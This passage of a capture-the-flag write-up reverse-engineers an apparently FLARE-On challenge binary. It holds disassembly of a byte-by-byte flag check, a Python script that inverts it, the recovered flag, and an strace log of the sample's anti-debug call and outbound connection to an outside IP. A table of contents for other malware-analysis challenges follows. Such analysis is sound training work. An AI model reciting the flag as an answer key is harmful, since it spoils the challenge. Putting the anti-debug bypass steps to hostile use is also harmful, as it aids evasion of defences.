0x00000000000001b9:  80 30 E8          xor     byte ptr [eax], 0xe8
183
0x00000000000001bc:  C0 00 95          rol     byte ptr [eax], 0x95
184
0x00000000000001bf:  80 30 4A          xor     byte ptr [eax], 0x4a
185
0x00000000000001c2:  80 30 AD          xor     byte ptr [eax], 0xad
186
0x00000000000001c5:  80 38 C3          cmp     byte ptr [eax], 0xc3
187
0x00000000000001c8:  74 02             je      0x1cc
188
0x00000000000001ca:  FF E3             jmp     ebx
189
0x00000000000001cc:  48                dec     eax
190
0x00000000000001cd:  83 C0 01          add     eax, 1
191
0x00000000000001d0:  C0 08 45          ror     byte ptr [eax], 0x45
192
0x00000000000001d3:  80 30 CC          xor     byte ptr [eax], 0xcc
193
0x00000000000001d6:  80 00 1C          add     byte ptr [eax], 0x1c
194
0x00000000000001d9:  80 38 03          cmp     byte ptr [eax], 3
195
0x00000000000001dc:  74 02             je      0x1e0
196
0x00000000000001de:  FF E3             jmp     ebx
197
0x00000000000001e0:  48                dec     eax
198
0x00000000000001e1:  83 C0 01          add     eax, 1
199
0x00000000000001e4:  80 28 4A          sub     byte ptr [eax], 0x4a
200
0x00000000000001e7:  80 38 E3          cmp     byte ptr [eax], 0xe3
201
0x00000000000001ea:  74 02             je      0x1ee
202
0x00000000000001ec:  FF E3             jmp     ebx
203
0x00000000000001ee:  48                dec     eax
204
0x00000000000001ef:  83 C0 01          add     eax, 1
205
0x00000000000001f2:  80 30 A5          xor     byte ptr [eax], 0xa5
206
0x00000000000001f5:  C0 08 90          ror     byte ptr [eax], 0x90
207
0x00000000000001f8:  80 38 CA          cmp     byte ptr [eax], 0xca
208
0x00000000000001fb:  74 02             je      0x1ff
209
0x00000000000001fd:  FF E3             jmp     ebx
210
0x00000000000001ff:  48                dec     eax
211
0x0000000000000200:  83 C0 01          add     eax, 1
212
0x0000000000000203:  C0 08 DE          ror     byte ptr [eax], 0xde
213
0x0000000000000206:  C0 00 36          rol     byte ptr [eax], 0x36
214
0x0000000000000209:  80 30 78          xor     byte ptr [eax], 0x78
215
0x000000000000020c:  80 28 D8          sub     byte ptr [eax], 0xd8
216
0x000000000000020f:  80 38 3E          cmp     byte ptr [eax], 0x3e
217
0x0000000000000212:  74 02             je      0x216
218
0x0000000000000214:  FF E3             jmp     ebx
219
0x0000000000000216:  48                dec     eax
220
0x0000000000000217:  83 C0 01          add     eax, 1
221
0x000000000000021a:  80 00 B5          add     byte ptr [eax], 0xb5
222
0x000000000000021d:  80 28 AD          sub     byte ptr [eax], 0xad
223
0x0000000000000220:  C0 08 89          ror     byte ptr [eax], 0x89
224
0x0000000000000223:  C0 00 A2          rol     byte ptr [eax], 0xa2
225
0x0000000000000226:  C0 00 11          rol     byte ptr [eax], 0x11
226
0x0000000000000229:  80 38 D8          cmp     byte ptr [eax], 0xd8
227
0x000000000000022c:  74 02             je      0x230
228
0x000000000000022e:  FF E3             jmp     ebx
229
0x0000000000000230:  48                dec     eax
230
0x0000000000000231:  83 C0 01          add     eax, 1
231
0x0000000000000234:  80 00 40          add     byte ptr [eax], 0x40
232
0x0000000000000237:  80 28 21          sub     byte ptr [eax], 0x21
233
0x000000000000023a:  C0 08 C0          ror     byte ptr [eax], 0xc0
234
0x000000000000023d:  80 38 82          cmp     byte ptr [eax], 0x82
235
0x0000000000000240:  74 02             je      0x244
236
0x0000000000000242:  FF E3             jmp     ebx
237
0x0000000000000244:  48                dec     eax
238
0x0000000000000245:  83 C0 01          add     eax, 1
239
0x0000000000000248:  C0 00 E3          rol     byte ptr [eax], 0xe3
240
0x000000000000024b:  80 38 7B          cmp     byte ptr [eax], 0x7b
241
0x000000000000024e:  74 02             je      0x252
242
0x0000000000000250:  FF E3             jmp     ebx
243
0x0000000000000252:  48                dec     eax
244
0x0000000000000253:  83 C0 01          add     eax, 1
245
0x0000000000000256:  80 28 78          sub     byte ptr [eax], 0x78
246
0x0000000000000259:  C0 08 F6          ror     byte ptr [eax], 0xf6
247
0x000000000000025c:  80 38 D7          cmp     byte ptr [eax], 0xd7

As you can see, for each letter, there are transformations (ror, rol, xor, add, sub) applied to the letter provided. The result is then compared to an expected result. If it succeeds (expected result), the program continues and if it fails, it exits.
Since we have the result of the transformations for each letter, it is possible to reverse the logic to get the initial letter. Let’s take an example (letter 4). The code is as follows:

1
add byte ptr [rax], 0xa3
2
ror byte ptr [rax], 0xbc
3
cmp byte ptr [rax], 0xb0

Pasted image 20260201231842.png

As you can see it is character by character check so we have to make script to automate it,

Pasted image 20260201233334.png

This script reverses a byte-by-byte verification routine or decryption in the binary to recover the correct second command-line argument.
In short, you have to enter 2nd flag as arg2 and it will perform certain operation with each character and compare it and if succeed then proceed.
So we can build flag from this operation by reverse decoding it.
Script Taken from: https://www.aldeid.com/wiki/The-FLARE-On-Challenge-01/Challenge-6

1
#!/usr/bin/env python
2

3
# source for rol and ror: http://www.falatic.com/index.php/108/python-and-bitwise-rotation
4
# Rotate left. Set max_bits to 8.
5
rol = lambda val, r_bits, max_bits=8: \
6
    (val << r_bits%max_bits) & (2**max_bits-1) | \
7
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
8

9
# Rotate right. Set max_bits to 8.
10
ror = lambda val, r_bits, max_bits=8: \
11
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
12
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
13

14
l = []
15

16
### Letter 1
17
"""
18
ror byte ptr [rax], 0xf2
19
cmp byte ptr [rax], 27
20
"""
21
l.append( rol(27, 0xf2) )
22

23
### Letter 2
24
"""
25
xor byte ptr [rax], 64
26
xor byte ptr [rax], 0xf2
27
xor byte ptr [rax], 0xb3
28
cmp byte ptr [rax], 48
29
"""
30
l.append( 48 ^ 0xb3 ^ 0xf2 ^ 64 )
31

32
### Letter 3
33
"""
34
xor byte ptr [rax], 113
35
cmp byte ptr [rax], 31
36
"""
37
l.append( 31 ^ 113 )
38

39
### letter 4
40
"""
41
add byte ptr [rax], 0xa3
42
ror byte ptr [rax], 0xbc
43
cmp byte ptr [rax], 0xb0
44
"""
45
l.append( rol(0xb0, 0xbc) - 0xa3 )
46

47
### letter 5
48
"""
49
sub byte ptr [rax], 121
50
cmp byte ptr [rax], 0xe8
51
"""
52
l.append( 0xe8 + 121 )
53

54
### letter 6
55
"""
56
ror byte ptr [rax], 0x82
57
sub byte ptr [rax], 40
58
cmp byte ptr [rax], 0xf6
59
"""
60
l.append( rol(0xf6 + 40, 0x82) )
61

62
### letter 7
63
"""
64
sub byte ptr [rax], 0xb0
65
ror byte ptr [rax], 77
66
add byte ptr [rax], 44
67
cmp byte ptr [rax], 31
68
"""
69
l.append( rol(31 - 44, 77) + 0xb0 )
70

71
### letter 8
72
"""
73
add byte ptr [rax], 84
74
rol byte ptr [rax], 0x99
75
xor byte ptr [rax], 0xb8
76
ror byte ptr [rax], 42
77
add byte ptr [rax], 63
78
cmp byte ptr [rax], 0xaf
79
"""
80
l.append( ror(rol(0xaf - 63, 42) ^ 0xb8, 0x99) - 84 )
81

82
### letter 9
83
"""
84
ror byte ptr [rax], 0xba
85
cmp byte ptr [rax], 93
86
"""
87
l.append( rol(93, 0xba) )
88

89
### letter 10
90
"""
91
xor byte ptr [rax], 0xed
92
ror byte ptr [rax], 108
93
add byte ptr [rax], 48
94
cmp byte ptr [rax], 41
95
"""
96
l.append( rol(41 - 48, 108) ^ 0xed )
97

98
### letter 11
99
"""
100
sub byte ptr [rax], 0xbf
101
cmp byte ptr [rax], 0xb5
102
"""
103
l.append( 0xb5 + 0xbf )
104

105
### letter 12
106
"""
107
rol byte ptr [rax], 0xbc
108
add byte ptr [rax], 0x8c
109
rol byte ptr [rax], 123
110
sub byte ptr [rax], 49
111
add byte ptr [rax], 99
112
cmp byte prt [rax], 0xa5
113
"""
114
l.append( ror(ror(0xa5 - 99 + 49, 123) - 0x8c, 0xbc) )
115

116
### letter 13
117
"""
118
rol byte ptr [rax], 32
119
rol byte ptr [rax], 22
120
xor byte ptr [rax], 0xae
121
rol byte ptr [rax], 0x98
122
cmp byte ptr [rax], 0xf3
123
"""
124
l.append( ror(ror(ror(0xf3, 0x98) ^ 0xae, 22), 32) )
125

126
### letter 14
127
"""
128
ror byte ptr [rax], 110
129
add byte ptr [rax], 0xd2
130
cmp byte ptr [rax], 0xa6
131
"""
132
l.append( rol(0xa6 - 0xd2, 110) )
133

134
### letter 15
135
"""
136
add byte ptr [rax], 52
137
cmp byte ptr [rax], 98
138
"""
139
l.append( 98 - 52 )
140

141
### letter 16
142
"""
143
add byte ptr [rax], 0xcd
144
sub byte ptr [rax], 16
145
add byte ptr [rax], 98
146
xor byte ptr [rax], 0xb2
147
cmp byte ptr [rax], 50
148
"""
149
l.append( (50 ^ 0xb2) - 98 + 16 - 0xcd )
150

151
### letter 17
152
"""
153
xor byte ptr [rax], 0xb7
154
xor byte ptr [rax], 115
155
ror byte ptr [rax], 7
156
cmp byte ptr [rax], 0xeb
157
"""
158
l.append( rol(0xeb, 7) ^ 115 ^ 0xb7 )
159

160
### letter 18
161
"""
162
add byte ptr [rax], 52
163
sub byte ptr [rax], 97
164
ror byte ptr [rax], 54
165
add byte ptr [rax], 91
166
sub byte ptr [rax], 76
167
cmp byte ptr [rax], 11
168
"""
169
l.append( rol(11 + 76 - 91, 54) + 97 - 52 )
170

171
### letter 19
172
"""
173
add byte ptr [rax], 90
174
cmp byte ptr [rax], 0x9a
175
"""
176
l.append( 0x9a - 90 )
177

178
### letter 20
179
"""
180
ror byte ptr [rax], 0xa2
181
cmp byte ptr [rax], 0x99
182
"""
183
l.append( rol(0x99, 0xa2) )
184

185
### letter 21
186
"""
187
xor byte ptr [rax], 126
188
sub byte ptr [rax], 0xe7
189
cmp byte ptr [rax], 43
190
"""
191
l.append( (43 + 0xe7) ^ 126 )
192

193
### letter 22
194
"""
195
sub byte ptr [rax], 0xb8
196
xor byte ptr [rax], 0x86
197
add byte ptr [rax], 78
198
ror byte ptr [rax], 74
199
rol byte ptr [rax], 87
200
cmp byte ptr [rax], 0xaf
201
"""
202
l.append( ((rol(ror(0xaf, 87), 74) - 78) ^ 0x86) + 0xb8 )
203

204
### letter 23
205
"""
206
ror byte ptr [rax], 0x86
207
xor byte ptr [rax], 0xe8
208
rol byte ptr [rax], 0x95
209
xor byte ptr [rax], 74
210
xor byte ptr [rax], 0xad
211
cmp byte ptr [rax], 0xc3
212
"""
213
l.append( rol(ror(0xc3 ^ 0xad ^ 74, 0x95) ^ 0xe8, 0x86) )
214

215
### letter 24
216
"""
217
ror byte ptr [rax], 69
218
xor byte ptr [rax], 0xcc
219
add byte ptr [rax], 28
220
cmp byte ptr [rax], 3
221
"""
222
l.append( rol((3 - 28) ^ 0xcc, 69) )
223

224
### letter 25
225
"""
226
sub byte ptr [rax], 74
227
cmp byte ptr [rax], 0xe3
228
"""
229
l.append( 0xe3 + 74 )
230

231
### letter 26
232
"""
233
xor byte ptr [rax], 0xa5
234
ror byte ptr [rax], 0x90
235
cmp byte ptr [rax], 0xca
236
"""
237
l.append( rol(0xca, 0x90) ^ 0xa5 )
238

239
### letter 27
240
"""
241
ror byte ptr [rax], 0xde
242
rol byte ptr [rax], 54
243
xor byte ptr [rax], 120
244
sub byte ptr [rax], 0xd8
245
cmp byte ptr [rax], 62
246
"""
247
l.append( rol(ror((62 + 0xd8) ^ 120, 54), 0xde) )
248

249
### letter 28
250
"""
251
add byte ptr [rax], 0xb5
252
sub byte ptr [rax], 0xad
253
ror byte ptr [rax], 0x89
254
rol byte ptr [rax], 0xa2
255
rol byte ptr [rax], 17
256
cmp byte ptr [rax], 0xd8
257
"""
258
l.append( rol(ror(ror(0xd8, 17), 0xa2), 0x89) + 0xad - 0xb5 )
259

260
### letter 29
261
"""
262
add byte ptr [rax], 64
263
sub byte ptr [rax], 33
264
ror byte ptr [rax], 0xc0
265
cmp byte ptr [rax], 0x82
266
"""
267
l.append( rol(0x82, 0xc0) + 33 - 64 )
268

269
### letter 30
270
"""
271
rol byte ptr [rax], 0xe3
272
cmp byte ptr [rax], 123
273
"""
274
l.append( ror(123, 0xe3) )
275

276
### letter 31
277
"""
278
sub byte ptr [rax], 120
279
ror byte ptr [rax], 0xf6
280
cmp byte ptr [rax], 0xd7
281
"""
282
l.append( rol(0xd7, 0xf6) + 120 )
283

284
# modulo 256 applied to ensure values are in range(256)
285
print ''.join([chr(i % 256) for i in l])

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ python2 solve.py
3
l1nhax.hurt.u5.a1l@flare-on.com

After giving flag as arg2 it is trying to connect with the some host, maybe try to mimic like a C2 server,

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched2 4815162342 l1nhax.hurt.u5.a1l@flare-on.com
3

4
[00007e36940de557] execve("./e7bc5d2c0cf4480348f5504196561297.patched2", ["./e7bc5d2c0cf4480348f55041965612"..., "4815162342", "l1nhax.hurt.u5.a1l@flare-on.com"], 0x7fffd1dd75e8 /* 35 vars */) = 0
5
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
6
[00000000004aa78a] brk(NULL)            = 0x4913000
7
[00000000004aa78a] brk(0x49141c0)       = 0x49141c0
8
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x4913880) = 0
9
[00000000004aa78a] brk(0x49351c0)       = 0x49351c0
10
[00000000004aa78a] brk(0x4936000)       = 0x4936000
11
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
12
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
13
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
14
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
15
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
16
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
17
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
18
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
19
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
20
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
21
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
22
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
23
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
24
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
25
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
26
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
27
[00007fff1a8fc114] socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
28
[00007fff1a8fc140] connect(3, {sa_family=AF_INET, sin_port=htons(39426), sin_addr=inet_addr("9.30.75.86")}, 16

Here is our flag,

1
l1nhax.hurt.u5.a1l@flare-on.com

Here is the flow of this program. (There might be some inaccuracy or mistake so sorry for that in advance because i am a leaner like you. 😅)

Pasted image 20260202005044.png

Challenge 1 - Bob Doge#

Stage 1 Extracting CAB File#

Initial Triage#

Basic Static Analysis:#

Stage 2 Analysis of .NET Sample#

Initial Triage#

Basic Static Analysis:#

Code Analysis#

Flag Extraction#

Challenge 2: Javascrap#

Stage 0 Character Table Construction#

Initial Triage#

Basic Static Analysis:#

Stage 1: Obfuscation Decoding#

1: Character Table Reconstruction#

Stage 2: Second-Layer Decoding#

Stage 3: Escaped Payload Interpretation#

Stage 4: Normalization and Flag Extraction#

Final Behavior#

Challenge 3:#

Stage 1 Extracting Shellcode from Wrapper EXE#

Initial Triage#

Basic Static Analysis#

Advance Static Analysis#

Advanced Dynamic Analysis#

Stage 2 Analyzing Shellcode#

Initial Triage#

Advance Static Analysis#

Advanced Dynamic Analysis#

Layer 1 XORed Encryption#

Layer 2 XORed Encryption#

Layer 3 XORed Encryption#

Layer 4 XORed Encryption#

Challenge 4:#

Stage 1 Malicious PDF Analysis#

Initial Triage#

Basic Static Analysis#

Advance Static Analysis#

Code Explanation#

Carving Next Stage#

Stage 2 Analyzing Shellcode#

Initial Triage#

Basic Static Analysis#

Advance Static Analysis#

Advance Dynamic Analysis#

Flag Extraction#

Challenge 5:#

Stage 1 Analyzing PE File#

Initial Triage#

Basic Static Analysis#

Advance Static Analysis#

sub_1000A570 function,#

sub_1000A610 function,#

sub_1000A4C0 Function#

sub_10009EB0 function,#

sub_10001000 function#

Challenge 6:#

Stage 1 ELF Analysis#

Initial Triage#

Basic Static Analysis#

Basic Dynamic Analysis#

Advance Static Analysis#

Patch 1: ptrace patching#

Patch 2: nanosleep patch#

Advance Dynamic Analysis#

Stage 2 Shellcode Analysis#

Initial Triage#

Basic Static Analysis#

Advance Static Analysis#

`sub_1000A570` function,#

`sub_1000A610` function,#

`sub_1000A4C0` Function#

`sub_10009EB0` function,#

`sub_10001000` function#